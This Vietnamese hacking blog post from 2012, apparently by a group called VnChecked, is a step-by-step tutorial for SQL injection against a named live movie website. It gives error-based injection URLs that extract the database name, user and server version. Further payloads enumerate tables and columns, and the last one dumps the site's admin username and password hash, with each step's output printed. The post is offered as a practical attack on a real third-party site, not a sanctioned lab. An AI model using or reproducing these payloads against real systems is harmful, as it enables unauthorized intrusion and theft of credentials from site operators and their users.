VnChecked: [TUT] Khai Thác Lỗi MySQL Query

k nói nhiều. ai hiểu cơ bản thì nó rất cơ bản. còn ai chưa hiểu thì cố hiểu nhé
victim : http://xem24h.tk/phim/index.php

thêm dấu ' trong ô seach thì báo lỗi:

http://xem24h.tk/phim/search/'

Lỗi MySQL Query : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

bây giờ chúng ta get version , database , và user :D

http://xem24h.tk/phim/search/'+or+1+group+by+concat(database(),0x7c,user(),0x7c,version(),floor(rand(0)*2))+having+min(0)+or+1--+-

Duplicate entry 'hkmsjmls_phim|hkmsjmls_phim@localhost|5.5.141' for key 'group_key'

bây giờ get table :D

http://xem24h.tk/phim/search/'+or+1+group+by+concat_ws(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1-- -

tiếp tục khai thác với limit nhé
tiếp theo là get Column từ table_user ( và tiếp tục với limit )

http://xem24h.tk/phim/search/'+or+1+group+by+concat_ws(0x7e,(select+column_name+from+information_schema.columns+where+table_schema=database() and table_name=0x7461626c655f75736572+limit 0,1),floor(rand(0)*2))+having+min(0)+or+1-- -

và cuối cùng
Data từ table_user

http://xem24h.tk/phim/search/'+or+1+group+by+concat_ws(0x7e,(select+concat(user_name,0x7c,user_password)+from+table_user+limit 0,1),floor(rand(0)*2))+having+min(0)+or+1-- -

Kết Quả cuối cùng :

Lỗi MySQL Query : Duplicate entry 'admin|7ecfe2c36387fdb0e6666af701fdf7e2~1' for key 'group_key'

End TUT !

VnChecked

Vài lời cho các bạn !

Sunday, July 15, 2012

[TUT] Khai Thác Lỗi MySQL Query - xem24h.tk